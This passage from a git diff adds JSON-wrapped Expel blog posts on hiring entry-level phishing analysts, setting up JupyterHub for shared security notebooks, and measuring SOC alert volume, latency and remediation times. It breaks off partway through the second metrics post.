entry for underrepresented groups in tech (and other industries) result in a lot of terrible things. And one of those is limited opportunities for people from underrepresented backgrounds to gain the years of experience that so many security jobs require. Bringing on someone who doesn\u2019t have the skills or knowledge to perform at the expected level impacts margins and puts the person in a bad spot for their mental well-being and likelihood of success. So we designed our hiring process with simple enough technical requirements and we focus almost exclusively on the traits of the people we\u2019re hiring. These are important traits that\u2019ll help them be successful in the role while we teach them the hard skills they\u2019ll need to do the job. This hiring strategy dramatically increases the pool of potential candidates who have the enthusiasm and willingness to learn but maybe haven\u2019t yet been given the opportunity they need to learn some hard skills. It lets us hire folks much earlier in their security journey and set them up for success. Entering a new industry, and particularly security work, can be intimidating. So we start by teaching our new phishing analysts technical fundamentals for a niche area of expertise. This foundation allows them to grow and expand as they\u2019re ready, and we tailor our approach to each individual based on their skills, strengths, growth areas, goals and personal life. Maintaining balance for each of our analysts is key. We get to provide them with a potentially life-changing opportunity to enter the field and learn the skills they\u2019ll need to succeed while they get to help our customers stay ahead of emerging threats. In a rapidly changing global landscape, we need to make sure we\u2019re prepared to quickly adapt. This doesn\u2019t just mean building new capabilities and building automations that continuously increase efficiency. It means planning for personal leave for both planned and unforeseen circumstances so our team can take the time they need to recharge while making sure that we never skip a beat. We also need to account for promotions, job changes and training time for new analysts. And we make sure that if an analyst leaves the team for one reason or another, we\u2019re still resourced to continue providing the same high-quality service our customers expect. This is thanks to our streamlined initial training that gets new hires combat-ready in just a few weeks. We also prioritize getting to know and staying in touch with folks who we believe will be a good fit for the team, even if we don\u2019t immediately have a job opening for them. That way, when a position becomes available, we can reach out and find someone ready to enthusiastically step into the role. Widening the talent pool Our approach to hiring and training our phishing team has already paid dividends. We\u2019ve promoted multiple analysts from our Expel Phishing team into our MDR service. And they\u2019ve stepped in and provided Expel MDR-level service in just two weeks. In May 2021, our phishing service became part of our 24\u00d77 operations. Since going 24\u00d77, we\u2019ve seen a 500 percent increase in email submissions. And our crew transitioned seamlessly. With equity at the forefront of our minds, we\u2019re also excited about the incredibly talented people who\u2019ve joined our team. So far, 31 percent of our phishing team hires are women and 44 percent are people of color. And by working in close collaboration with our Equity, Inclusion and Diversity (EID) leads, we plan to continue widening our talent pool to bring on the best of the best from different backgrounds and experiences. We know a focus on EID initiatives will help us create the strongest team. Meet some of the crew So, how\u2019s it going for our new Expletives on Expel\u2019s Phishing team? Here\u2019s what they\u2019re saying: \u201cI was so burnt out on applying for positions and going through lengthy interview processes that I was having major anxiety. Expel\u2019s recruiter, Neiko, picked up on that immediately and went into \u2018how can I help\u2019 mode. This was my first major indicator that maybe Expel wasn\u2019t like any other company. We talked, rescheduled and thankfully two weeks later I was presented with an offer. I never could have imagined the trajectory my career has taken in such a short amount of time, but that\u2019s the thing with Expel \u2014 anything is possible!! From day one, my team lead was proactive in asking about and helping me develop some career goals. I definitely credit our weekly 1:1\u2019s as well as my growing responsibilities as a huge catalyst for me learning new things and strengthening my skill set. Coupled with the fact that you are surrounded by like-minded individuals who love what they do and are passionate about cybersecurity, you have a recipe for success. Both my team lead and senior analysts helped me thrive. From a junior phishing analyst to associate MDR analyst, cheers to an environment that fosters real growth!\u201d Stacey Lokey , associate MDR analyst \u201cBreaking into the cybersecurity industry is not an easy task. Be prepared to edit your resume, prepare for interviews and just keep pushing ahead after hearing \u2018no.\u2019 Even when one does break into the industry, landing in an environment that is positive and actively promotes one\u2019s growth is like finding a needle in a haystack. Then there\u2019s Expel, a company that not only looks for entry-level analysts but also provides a pipeline to become a career-level analyst. My experience with Expel was the dictionary definition of seamless. After speaking with the hiring managers and hearing many of their journeys to the security field, I knew I wanted to join the team. At Expel, it wasn\u2019t only about the technical expertise of the industry but about who you are as a person and relatable skills that successful analysts tend to possess.\u201d Dom Bryant , SOC security specialist \u201cMy experience as a junior SOC analyst on the Phishing team greatly prepared me for a role on the MDR team. Working on malicious email submissions and BEC activity provided a great foundation for \u201cworking on the bad\u201d (one of my favorite parts of the job). Additionally, although I was on the phishing team, our SOC is one team as a whole. It was because of this that I was able to gain exposure to MDR alerts, processes, incidents and even get some hands-on experience with the help of other team members. All of this experience led to me feeling much more calm and confident when transitioning to the MDR team.\u201d Tucker Moran , associate detection & response analyst \u201cStarting out as a member of the phishing team allowed me to focus on a single alert type while getting familiar with all of the technology that Expel has access to, as well as the various customers we support. This experience allowed me to focus on developing my analyst skill set, while figuring out my personal process for triaging alerts. Given a few months in this role, I became comfortable with taking the next step over to MDR where we handle a much larger variety of alert types. While it can certainly be done, it was a much less overwhelming transition being comfortable with the different technology and processes before making the jump.\u201d Kayla Cummings, associate detection & response analyst Interested in joining our crew? We\u2019d love to hear from you !" +} \ No newline at end of file diff --git a/our-journey-to-jupyterhub-and-beyond.json b/our-journey-to-jupyterhub-and-beyond.json new file mode 100644 index 0000000000000000000000000000000000000000..43973f212ec96da0472396b35f95ebb0f4a76bfe --- /dev/null +++ b/our-journey-to-jupyterhub-and-beyond.json @@ -0,0 +1,6 @@ +{ + "title": "Our journey to JupyterHub and beyond", + "url": "https://expel.com/blog/our-journey-jupyterhub-beyond/", + "date": "Sep 3, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Our journey to JupyterHub and beyond Security operations \u00b7 8 MIN READ \u00b7 PETER SILBERMAN \u00b7 SEP 3, 2019 \u00b7 TAGS: Get technical / How to / Managed detection and response / Planning / SOC If you\u2019re like us and you do technical research in a team, you\u2019ve likely run into a set of canonical problems. For example: You\u2019re looking at some amazing graphs done by someone who\u2019s on vacation (or doesn\u2019t work here anymore) and have no idea how they were generated. You\u2019re looking at python code that implements a formula from a paper, but you can\u2019t understand if that\u2019s a matrix multiplication or a typo. Sound familiar? We\u2019ve found several tools that help us solve these kinds of challenges. Chief among them is Jupyter Notebooks. If you aren\u2019t familiar, Jupyter Notebooks offers \u201can open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text.\u201d The (very few) pitfalls of Jupyter Notebooks Although notebooks are a great tool, we started running into a few bumps as soon we started to scale them across several teams. Here are some of the challenges we faced: Keeping content up to date was a pain and required all authors of notebooks to also know how to use git. Sharing research projects with different employees and teams required us to send notebooks via Slack or other means. Sharing notebooks from one user to another didn\u2019t always work due to package dependencies that one user had that another user didn\u2019t. Data sprawl was challenging \u2014 data was on employee laptops, couldn\u2019t easily be shared and would eventually need to be deleted by the employee. Managing credentials and API keys for each notebook wasn\u2019t convenient. There wasn\u2019t an easy way to \u201cproductionize\u201d a notebook \u2014 meaning we couldn\u2019t take a notebook that solved a problem for our operations team and make it available to everyone without sending it to them all or having them check out the notebook locally, install all dependencies and run the notebook when they wanted to use it. The good news, though, is that there are plenty of other tech teams that use notebooks, along with data science companies that help other orgs solve challenges just like these. So we looked into how Netflix uses notebooks ( Beyond Interactive: Notebook Innovation at Netflix , Part 2: Scheduling Notebooks at Netflix ). We even tried deploying AirBnB\u2019s Knowledge Repo. We looked at a couple data science platforms but quickly discovered that we\u2019d only need to use a small subset of their features so we couldn\u2019t justify the high cost. TL;DR: Our team loved Jupyter Notebooks but needed a more centralized model to make them work effectively across our company. JupyterHub saves the day After doing some additional research, we discovered JupyterHub. And it was exactly what we were looking for to help our notebook scale. What\u2019s JupyterHub, exactly? The JupyterHub website says it best: JupyterHub brings the power of notebooks to groups of users. It gives users access to computational environments and resources without burdening the users with installation and maintenance tasks. Users \u2013 including students, researchers, and data scientists \u2013 can get their work done in their own workspaces on shared resources which can be managed efficiently by system administrators. JupyterHub runs in the cloud or on your own hardware, and makes it possible to serve a pre-configured data science environment to any user in the world. It is customizable and scalable, and is suitable for small and large teams, academic courses, and large-scale infrastructure. In security nerd speak, JupyterHub creates a multi-user server where each user kernel is an isolated python process. This means that two users can run the same notebook with different input parameters and get different results \u2014 and that capability alone solves several of our problems. Benefits of centralizing notebooks using JupyterHub After setting up JupyterHub (more on that in a minute), we quickly discovered lots of benefits of centralizing our teams\u2019 notebooks: Notebooks are accessible across the org by default, which meant we didn\u2019t have to send .ipynb files back and forth. End users don\u2019t have to worry about keeping their content up to date in a GitHub repo \u2014 because users are doing their work in JupyterHub, notebooks are always up to date. Everyone uses the same environment with JupyterHub, which reduces the chances of the team running into dependency issues. There\u2019s no need to store data on employee laptops, which means you know where your customers\u2019 data is at all times. We provide a convenient way for users to leverage API keys and user credentials. We can \u201cproductionize\u201d a notebook simply by having a directory hierarchy that supports the notion of \u201csupported\u201d notebooks that are versioned (more on this later). This means we don\u2019t have to Slack users about updates to notebooks. Instead we can upgrade the notebook they\u2019re using on our central server. We centrally manage and monitor usage to keep customer data safe. How to set up JupyterHub When we build new infrastructure here at Expel or start to use new platforms, we always try to reuse previously defined engineering processes. In this case, we already use CircleCI for CI, GitHub for revision control and Ansible / Terraform for infrastructure management/deployment. We decided that using these existing tools and processes would make it easier to manage and scale the service over the long term (and it\u2019ll keep our Site Reliability Engineers (SREs) happy). Using our existing tools and processes also means we can easily manage packages, control versions of productionized notebooks and more. We also knew that for notebooks that were used by more than a few people, we should version those so that if something goes wrong we can easily roll them back. So our JupyterHub setup looks like this: We stood up our JupyterHub environment in Google Cloud Platform, but you could easily follow a similar workflow as shown above if you\u2019re using Microsoft Azure or Amazon Web Services or even setting this up on prem. JupyterHub (to its credit) has a lot of configuration options. These are accessible through jupyterhub_config.py . It\u2019s somewhat overwhelming how much you can configure. To make it easier for you to wade through the many options, we\u2019ll share a couple of the configuration options that we tweaked and why. Authentication JupyterHub has amazing support for various authentication mechanisms. That\u2019s great for us. We choose to use OAuth which allows us to enforce multi-factor authentication but also gives Expel employees easy access. Default URL Using the default URL setting, we built a landing page which allowed new users to get up to speed faster. In practice, all we had to do was add this line of code within the JupyterHub configuration: c.Spawner.default_url = '/notebooks/Welcome.ipynb' This configuration forces a redirect when users log into a specific page. In our case the page provided new users with a set of \u201cgetting started\u201d tips including rules of the road \u2014 telling folks who are new what not to do (storing passwords and auth tokens in notebooks, for instance) to help them get off on the right foot. Even better, we provide examples of how to do those things correctly. Landing page We customized our landing page for JupyterHub Notebooks, and created a list of FAQs to address some of the questions our initial devs got used to answering. Here\u2019s a screenshot of our welcome page: Getting Started / Example notebooks: We have example notebooks that show how to log into our system and access data, and we also have example notebooks that access DataDog and other common services. Notebook header guidelines: We want to have some consistency in our notebooks so we ask users to follow a very simple template pattern so that it\u2019s easy to understand what the purpose of the notebook is etc. Below is the markdown we recommend Expel employees use when creating a new notebook: # Notebook Name ## Purpose What are you trying to do with this notebook? ## Audience Who is this notebook developed for? ## Data Sources * Data source 1 * Data source 2 ## Description (How does it work?) 1. Step 1 2. Step 2 3. Step 3 \u2026 ## Parameters Parameter | Description \u2014\u2014\u2014 | \u2014\u2014\u2014\u2013 PARAM_1 | Blah blah PARAM_2 | Blah blah ## References * Links to documentation or external references Environmental Variables We decided early on to make accessing various services as easy as accessing a list of defined environmental variables. We set all of our environmental variables via c.Spawner.environment which allows each instance of a notebook to have the same environmental variables. This way if a user wants to pull metrics from DataDog he doesn\u2019t have to generate his own API/APP key and instead can use the one on JupyterHub. The same is true for other services. More JupyterHub tips and tricks Once you\u2019ve got JupyterHub up and running, it\u2019s easy to perform simple tasks related to notebooks, like deploying new ones or managing notebook content. Here are a couple tricks we learned along our JupyterHub journey that might be helpful as you\u2019re getting JupyterHub set up in your own org. How to deploy new JupyterHub notebooks We\u2019ve gotten a lot of mileage out of applying some DevOps patterns to our JupyterHub deployment. As an example, we were able to leverage the github template repos to build a notebook template. This allows a new user to click a few buttons and have all the boiler-plate for running a notebook in our environment without having to cut-and-paste anything. This mirrors what we\u2019ve done in our product development, where we\u2019ve built out templates for services in Golang, Python and Node.js. We decided to create a templatenotebook repo (see the image above) to make it easy for authors to move and manage specific notebooks in GitHub. The CircleCI process I talked about earlier that kicks off builds an RPM with the notebook and the tagged version. This allows authors to version notebooks for deployment and allows us to roll them back if we accidentally introduce a bug. How to adjust filesystem permissions in JupyterHub One challenge we knew we needed to solve (and hoped JupyterHub could help) was to effectively manage notebook content on the filesystem in a way that allowed users to safely read and execute each other\u2019s notebooks. In order to do this, we tied unix groups and filesystem permissions together with our OAuth integration. Each new user is automatically added to a developer group that has read and execute privileges on all other home directories. This allows our analysts to run notebooks from other users, but not modify them. If a notebook is deemed operationally important, we\u2019ll move it out of a user\u2019s home directory, create a GitHub repo to manage the check-ins, tag releases of the notebook that built RPMs and then deploy those RPMs and install the notebook to a specific directory (that is read-only and execute for all users). Then other team members can bookmark the location. To make sure we don\u2019t lose our work, we run daily back ups and retain them for 14 days. Our experience with JupyterHub (so far) In just the few months we\u2019ve had JupyterHub operationalized, we\u2019ve seen awesome adoption among employees. Almost 100% of Expel employees who work with customers \u2014 that is everyone from our SOC analysts to our customer success team \u2014 has logged into the server at some point. We\u2019ve seen an uptick in notebook creation, with 170 unique notebooks created in approximately two months\u2019 time on JupyterHub versus the 15 notebooks previously checked into GitHub. Up next for our use of JupyterHub at Expel is to be able to schedule the parameterized run of a set of notebooks. We\u2019re looking into using papermill or paperboy for this. In addition, as we move our production infrastructure to Kubernetes, we\u2019re looking to tightly integrate that, allowing users to run Kernels inside our Kubernetes infrastructure. If you\u2019re looking for ways to make research more accessible and easier to manage among your team(s), check out JupyterHub. Even if you don\u2019t have much experience with it, JupyterHub\u2019s documentation makes it easy for anyone to get up and running in no time. In the coming months we\u2019ll be releasing a few more blog posts that talk about specific use cases for JupyterHub \u2014 everything from using it for hunting decision support to how we\u2019re using JupyterHub for tuning detection thresholds. A huge thank you to Justin Willis and Reilly Herrewig-Pope on our infrastructure team. They were instrumental in helping configure, stand up and figure out how best to manage JupyterHub and our notebooks. Additionally, I\u2019d like to thank Andrew Pritchett and Brandon Dossantos for not being happy with the status quo of notebooks + GitHub." +} \ No newline at end of file diff --git a/performance-metrics-part-1-measuring-soc-efficiency.json b/performance-metrics-part-1-measuring-soc-efficiency.json new file mode 100644 index 0000000000000000000000000000000000000000..2238f30619982e8daecf64bc13dc340448f3aff1 --- /dev/null +++ b/performance-metrics-part-1-measuring-soc-efficiency.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 1: Measuring SOC efficiency", + "url": "https://expel.com/blog/performance-metrics-measuring-soc-efficiency/", + "date": "Sep 29, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 1: Measuring SOC efficiency Security operations \u00b7 10 MIN READ \u00b7 JON HENCINSKI, ELISABETH WEBER AND MOR KENANE \u00b7 SEP 29, 2020 \u00b7 TAGS: MDR / Metrics / SOC A head of a SOC team, an analytics engineer and a data scientist walk into a bar (or a Zoom chat nowadays) \u2026 Okay, so maybe it wasn\u2019t a bar, but we did come together to chat about metrics. The result is this three-part blog series. That\u2019s right \u2013 three blog posts! It\u2019s hard to cover all things SOC efficiency and leadership in just one post. And given that we\u2019ve been receiving a lot of questions around SOC metrics, we thought it would be helpful to spend some time defining what we mean by SOC metrics and how they are used to make sure our customers \u2013 and our team! \u2013 remain happy. The truth is: a lot of SOC burnout is the result of ineffective operations management. A SOC can be a great place to work. At Expel, metrics are more than measurements. Metrics help us take care of the team. Here\u2019s what we\u2019ll cover: In this first post, we\u2019ll share our thoughts on how to set up a measurement framework that helps SOC leads ensure goals are being met (and when they\u2019re not). The second post will dive in a little deeper to explore how to avoid burnout by guarding the system against volatility. In our final post, we\u2019ll share some IRL examples and what we did to achieve our aim. What are cybersecurity metrics, and why do we need them? Setting up a way to measure success is important to making sure you have an effective SOC . The way we see it, great leaders organize their teams around a compelling goal (or aim), arm the team with the right metrics to inform where they are in the journey and then get out of the way. There\u2019s no more strategic thing than defining where you want to get to and measuring it. Strategy informs what \u201cgreat\u201d means and measurements tell you if you\u2019re there or not. In this post, we\u2019re going to discuss how to create a strategy with a clear aim, share the metrics we use here at Expel to measure the efficiency of our SOC, along with each team member\u2019s unique perspective on why these measurements work. After hearing from our team, you\u2019ll be able to apply our approach as you establish goals for your own SOC. Create your cybersecurity metrics strategy A strategy starts with a compelling aim. To keep it simple: Goals are things you want, strategy is how you\u2019re going to get there and measurements tell you where you are in that journey. If you don\u2019t have an aim you might fall into the trap of measuring just to measure and the result could be a lot of work with no progress. Let\u2019s say you have your compelling aim of where you want to get to. You know what you want to measure. But do you have the data you need to measure? Before you can create great metrics you need to start with good, reliable data. So where should you get that data? In our case, our SOC analysts use a platform called Expel Workbench to perform alert triage, launch investigations and chase bad guys. We track a lot of the analyst activity and the data from that activity is accessible to us through our APIs. Through those APIs we can pull info like arrival time of an alert, the time when an analyst started looking at an alert, when an analyst closed an alert and more. It\u2019s important to note that while sometimes it\u2019s certainly okay to start by measuring the data you have available, we recommend that you understand what you want to measure (informed by your strategy) and invest the time, effort and energy in making that data available. To build, maintain and scale the Expel SOC we set clear aims, arm the team with Jupyter Notebooks , use data for learning and then iterate. Here\u2019s our formula for success: Clear aims + ownership of the problem + data for learning + persistence = success Define your goals These are the aims we identified for the Expel SOC: Has a firm handle around capacity: We know how much total analyst capacity we have, what the loading was for any given day or month, and we\u2019re able to forecast what loading will look like in the future based on our anticipated customer count. This will tell us how we\u2019re going to scale. Responds faster than delivery pizza: Thirty minutes or less to spot an incident and provide our customers steps on how to fix the problem. Improves wait times: Almost everything we touch in our SOC is latency sensitive. Wait times should improve. Improves throughput: If we\u2019re performing the same set of analyst workflows again and again, let\u2019s identify that and automate the repetitive tasks using our robots. Measures quality: Has a self-correcting process in place and finds opportunities for improvements and automation. Now that we\u2019ve shared our goals, let\u2019s talk about metrics. Develop cybersecurity metrics Next we\u2019re going to walk you through three metrics we think are fundamental to managing a SOC: When do alerts show up? (alert seasonality) How long do alerts wait before a robot or an analyst attends to them? (alert latency) How long does it take to go from alert to fix? (remediation cycle time) These metrics are key to measuring efficiency because they tell you when work shows up, how long work waits and how well the system is performing. W. Edwards Deming once said, \u201cEvery system is perfectly designed to get the result that it does.\u201d If we\u2019re slow to respond to alerts or incidents (30 minutes or less in our SOC), we know there\u2019s a flaw in the system. These three metrics help us understand how we\u2019re performing. For each measurement, we\u2019ll provide our perspectives on why we measure (from Jon, Expel\u2019s SOC lead) and how we build and optimize those measurements (from Elisabeth , Expel\u2019s data scientist, and Mor, Expel\u2019s analytics engineer). Metric #1: When do alerts show up? Jon\u2019s perspective: If we go back to our aim, we know that to build a highly effective SOC ( especially now that we\u2019re remote ) we need to have a firm handle around capacity and utilization. I need to know when alerts show up. That informs when folks on the team show up to work. If there\u2019s more loading in the morning, I\u2019ll make sure we have more analysts on shift in the beginning of the day. If we add a customer in an international time zone, I\u2019ll monitor and make sure the time when alerts show up doesn\u2019t change. If it does, I\u2019ll adjust when folks show up to work. Elisabeth\u2019s perspective: To figure out when work shows up, we started with some really basic metrics and then worked our way up to more complicated seasonality decomposition and capacity modeling (more to come in a future post). We started by simply looking at the median hourly alert count. Using this metric, we see at what times of day our volume spikes the most, and in turn, when we need to staff the most analysts. This is something we continue to track over time, and as you can see in the graph below, the pattern changed. The blue line shows the hourly counts for October 2019, the orange line shows the hourly counts for March 2020 and the green line shows hourly counts for July 2020. October data peaked between 10 a.m. and 4-5 p.m. ET. However, by March we started to see that line flatten a little and this trend continued into July. As we\u2019ve added more West Coast and international customers, our load became more consistent throughout the day. Median Hourly Alert Count in October 2019 vs. March 2020 vs. July 2020 We saw this shift happening thanks to the fact that we use alert seasonality as a metric. As a result, we were able to proactively staff more analysts later into the day to avoid any overload. Metric #2: How long do alerts wait? Jon\u2019s perspective: Almost everything we do in our SOC is latency sensitive. The longer an alert waits, the potential for downstream damage to a customer increases. Alert seasonality tells me when work shows up but alert latency tells me how quickly we\u2019re able to pick up work as it enters the system. If alerts latency times are high this tells me one of three things is happening: we don\u2019t have enough capacity to keep up, we\u2019re spending too much time chasing bad leads or we\u2019re over subscribed responding to incidents. The key here is to set wait time goals \u2013 you may call these Service Level Objectives (SLOs) \u2013 then monitor and adjust. You don\u2019t want to tune to your relative capacity here. The trick is to find where you can use technology and automation to hit your targets and make this easy on the team. Mor\u2019s perspective: Alert latency is a fairly simple calculation. We measure the time between two timestamps: The time an alert entered the queue; and The time when that same alert was first actioned. If an alert entered the queue at 11 a.m. ET and the first action was performed 20 minutes later, the alert latency is 20 minutes. We measure alert latency for every alert that enters the queue to understand how long alerts are waiting and if we\u2019re within tolerance of our SLOs. Alert latency is important within the context of SOC operations. If you\u2019re considering setting an aim to pick up alerts fast \u2013 consider these two key factors. Measure the 95th percentile \u2013 not the median: At Expel, when measuring alert latency, we use the 95th percentile. So in essence, our metric helps us understand how long alerts wait before first action 95 percent of the time. If we were to use the median latency, that\u2019d only tell us how long alerts wait 50 percent of the time. In doing so we may think we\u2019re more effective than we really are. Bottom line: Use the 95th percentile or higher to understand alert latency. Not all alerts are created equal: Alerts show up with different severities. Each severity has a different SLO. At Expel an alert can be labeled with one of five different severities: Critical High Medium Low Tuning The easiest way to think about severity is confidence + impact = severity . If I\u2019m confident that when an alert fires it will be a true positive AND it will lead to really bad outcomes for a customer, the alert will be labeled with a critical severity. We\u2019ll set an SLO that our SOC will pick those up within five minutes. The SLOs increase in time as we become less confident that the alert will be a true positive. When I built this metric understanding that I needed to slice and dice on alert severity was super important. We track alert latency weekly and monthly broken out by severity. When we review alert latency as part of our weekly check, we\u2019ll record our performance in a simple table (like the one below): Alert Latency Alert Severity SLO 95th % Critical 5 minutes [font_awesome icon=check] High 15 minutes [font_awesome icon=check] Medium 2 hours [font_awesome icon=check] Low 6 hours [font_awesome icon=check] Tuning 12 hours [font_awesome icon=check] Alert latency table When reviewing alert latency on a month-to-month basis, trending out performance in a time series distributed by severity allows us to spot performance issues. For example, if our SLO times for low severity alerts start to increase, we know if we don\u2019t act we\u2019ll likely see our medium, high and critical SLO times degrade. Our lower severity SLO times act as a leading indicator. The key is to monitor and adjust. Alert latency time series summarized monthly broken out by severity Jon\u2019s perspective: To amplify what Mor said, if I see SLO times for low, and tuning alerts trend in the wrong way (things are taking too much time), I know we need to act now or SLOs for >=medium severity will degrade over time. As Mor said, the key is to monitor and adjust. And by adjust I don\u2019t mean tell the team to \u201cwork faster.\u201d Never do this. You need to understand the work that\u2019s showing up, optimize detections, tune and apply filters where needed and automate. We wrote a blog post on how our SOC analysts use automation to triage alerts, in case you\u2019re interested in learning more about how that process plays out. Metric #3: How long does it take to go from alert to fix? Jon\u2019s perspective: This is another measurement focused on time. Remediation cycle time is the time it takes a SOC analyst to pick up an alert, declare an incident, orient and provide remediation actions to our customers. I believe that speed matters when dealing with an incident and measuring alert-to-fix times is a good way to understand SOC performance. In fact, we provide this metric in every incident \u201cFindings\u201d report to our customers. Alert-to-fix timeline \u2013 included with every Expel incident \u201cFindings\u201d report We review alert-to-fix times weekly and anytime we don\u2019t meet our mark of 30 minutes or less, we take a look at an incident and find ways to improve. It\u2019s data for learning. You may be thinking: but what about quality control? When optimizing for speed I highly recommend you back that with a quality control program . Mor\u2019s perspective: This is another straightforward calculation. We measure the time between two timestamps: The time an alert entered the queue; and The time the first remediation recommendations were provided to the customer. When we talked about alert queue times we mentioned that we label alerts with a severity (there are five) and that severity is a notion of confidence + impact. How this plays out in practice is that most of the time when an alert labeled with a \u201ccritical\u201d or \u201chigh\u201d severity fires, it means most of the time we spotted a threat vs. a false positive condition. Not necessarily all of the time, but most of the time. This allows us to measure and optimize wait times. We take a similar approach with incident remediation cycles times. We break out incidents into four categories: Non-targeted incidents (think commodity malware \u2013 Hello, EMOTET!) Targeted incidents (the bad guy wants to break into your organization Business email compromise (there\u2019s so much of this it has its own class) Policy violations (someone did a thing that resulted in risk for the org) This allows us to understand how quickly we\u2019re able to respond based on the type of incident we detected. Are alerts waiting in the queue for non-targeted incidents? Are we spending too much time fighting the SIEM to figure out how many users received that phishing email? How much time are we spending writing an update vs. investigating? Can we optimize that? It all matters. We break out incident remediation cycle times by the class of incident, inspect what\u2019s happening and use the data to learn and improve. Here\u2019s an example of how we optimized incident remediation cycle times for Business Email Compromise incidents. TL;DR \u2013 We automated alert triage, investigation, the response and optimized how we communicate information to our customers. Our SOC analysts focus on making complex decisions and we use tech for the heavy lifting. Knowing how long the work takes is a good first step \u2013 but break the data out into buckets to help you understand where to get started. You\u2019ve got your goal and your data \u2026 what now? Before you \u201c measure all the things \u201d remember to have a compelling aim. If you don\u2019t and just measure what\u2019s available you may be optimizing for the wrong outcome \u2013 doh! After we defined our strategy we talked about fundamental metrics to know when alerts show up, how long they wait and how long it takes to spot an incident and provide our first recommendation on how to stop it. In our next post, we\u2019ll talk about the metrics we use to monitor the SOC end-to-end system as a whole. In our final post we\u2019ll share SOC metric success stories. Make sure you subscribe to our blog so that you\u2019ll get the posts in the rest of this series sent right to your inbox. Resource sharing is caring Want a TL;DR version of this for quick reference in the future? Expel\u2019s SOC management playbook: Define where you want to get to (your strategy) Deploy measurements to help guide you and the team Learn how to react to what the measurements are telling you Iterate Persist Celebrate" +} \ No newline at end of file diff --git a/performance-metrics-part-2-keeping-things-under-control.json b/performance-metrics-part-2-keeping-things-under-control.json new file mode 100644 index 0000000000000000000000000000000000000000..9bc06c494511efb6d277ce3db7fd4c2edf7b1182 --- /dev/null +++ b/performance-metrics-part-2-keeping-things-under-control.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 2: Keeping things under control", + "url": "https://expel.com/blog/performance-metrics-keeping-things-under-control/", + "date": "Oct 20, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 2: Keeping things under control Security operations \u00b7 9 MIN READ \u00b7 JON HENCINSKI, ELISABETH WEBER AND MOR KENANE \u00b7 OCT 20, 2020 \u00b7 TAGS: Careers / MDR / Metrics / Tech tools Metrics aren\u2019t just for status reports, mmmkay . Effective SOC managers embrace data and use metrics to spot and fix problems. At Expel, reviewing metrics and adjusting is how we take care of the team \u2013 and our customers! In this part-two installment of our three-part blog series on all things SOC metrics and leadership, we\u2019ll dive in a little deeper to explore how we use data to spot potential warning signs that SOC analyst burnout is ahead \u2013 a critical factor in SOC performance. How to predict SOC analyst burnout You know \u2026 that feeling of defeat? When empathy is suddenly replaced with apathy because too many alerts are showing up, and they\u2019re taking too long to handle? Management just doesn\u2019t seem to have their finger to the pulse on the current state of things? Nothing changes because \u201cthat\u2019s how we\u2019ve always done it!\u201d You begin asking: \u201cIs this what I signed up for?\u201d Yeah, that\u2019s what we mean by SOC burnout. And it\u2019s common. In fact, it\u2019s something many of us have experienced at prior jobs. Just like investigations, effective operations management is rooted in the quality of questions asked. In this blog post, we\u2019ll share operations management metrics, the techniques we use to gather the right data and tips-and-tricks for how to analyze the data and implement your learnings. Here\u2019s what we\u2019ll talk about: Operations Management Metric Question(s) Technique Tools Did the daily mean number of alerts change? When did it last change? Change-Point Analysis Python \u2013 there are lots of examples on GitHub What\u2019s the daily alert trend? Is it up, down or steady? Time Series Decomposition Python \u2013 statsmodels.tsa.seasonal library Is my alert management process in a state of control? Or are things totally borked? Time Series Decomposition Shewhart control chart If terms like time series decomposition, residuals, seasonality and variance are new to you \u2013 don\u2019t worry. No previous experience required. We\u2019ll walk you through each of these operations management metrics and how these techniques are applied. Metric #1: What\u2019s the mean number of alerts we handle per day? Technique: Change-Point Analysis Tool: Python TL;DR: You need to understand how many alerts show up each day. And if that number changes you need to know when and why. You likely don\u2019t have infinite SOC capacity (people), and if too many alerts are showing up relative to your available capacity, you\u2019re going to be in trouble. Change-Point Analysis is our Huckleberry here . Elisabeth\u2019s perspective: Change-Point analysis is a method for finding statistically significant changes in time series data. What does statistically significant mean? In this case, that just means the change in alert data is significant enough to indicate that it\u2019s more than just typical daily noise. It helps us spot changes like these: Change-Point graph showing where changepoints were identified in daily alert count data with context. When we detect a significant change, we ask questions like: Did we onboard a new customer on that day? Did we release a new vendor integration? Did a vendor release any new features? Were there any big alert spikes? Is there any on-going red team activity? Bottom line: If we don\u2019t have an explainable cause, we dig deeper to understand what happened so we can adjust. We then ask ourselves questions like: Do we need to spend time \u201ctuning\u201d detection rules? Do we need to write a new investigation workflow to automate repetitive tasks? Sometimes we even ask ourselves if we just need to turn off a detection because the juice ain\u2019t worth the squeeze. Jon\u2019s perspective: Change-Point analysis tells me how many alerts we handle each day. When we see a significant change (up or down) we immediately spring into action to understand why. For example, by looking at the Change-Point graph Elisabeth just shared, I was able to see that: Between May 1, 2020 throughJune 21, 2020 the daily alert count was relatively steady \u2013 the mean did not change. On June 21, 2020 the mean daily alert count doubled! Why? Cobalt Strike . It\u2019s always Cobalt Strike. I\u2019m not joking. It was a red team \u2013 the customer didn\u2019t want to remove access \u2013 so we had a ton of true positive alerts for the activity. We were able to handle the increase by using tech (automation). On July 5, 2020 the mean daily alert count went down a bit as the customer removed BEACON agents. On July 13, 2020 things were mostly back to \u201cnormal.\u201d What did we do after looking at the data? First, we noted the significant change. Then we quickly reviewed our detection metrics to understand why the daily alert count doubled (hello, BEACON agent). Lastly, we used tech , not people, to handle the increased alert loading. A super quick time series decomposition interlude Technique: Time Series decomposition Tool: Python, statsmodels.tsa.seasonal library Elisabeth\u2019s perspective: Time series decomposition is a method for splitting time indexed data into three pieces: trend, seasonality and residuals. This split is done in an additive way like you see in the below equation. Trend + Seasonality + Residuals = Observed Value Let\u2019s break each piece down a bit further: What\u2019s the trend? This is the general directional movement that we see in the data. You can think of this like smoothing out all the small bumps in the raw data to get a better view of the true directional movement. What\u2019s seasonality? These are the repeated patterns that we see. Depending on how your data is aggregated, these could be hourly, daily, weekly, monthly or even yearly patterns. For example, when we look at daily aggregated data, we tend to see higher alert volume on weekdays compared to weekends. What are residuals? This is everything that is leftover after removing the trend and seasonality. This is basically the noise in the data, or the parts that can\u2019t be attributed to the trend or seasonality. To perform seasonal decomposition, we use the seasonal_decompose function from the Python statsmodels.tsa.seasonal library. Since we\u2019re running this analysis on aggregated daily alert counts, we prep our data by summing the total number of daily alerts and formatting the data to be date indexed. Once the data is formatted, the 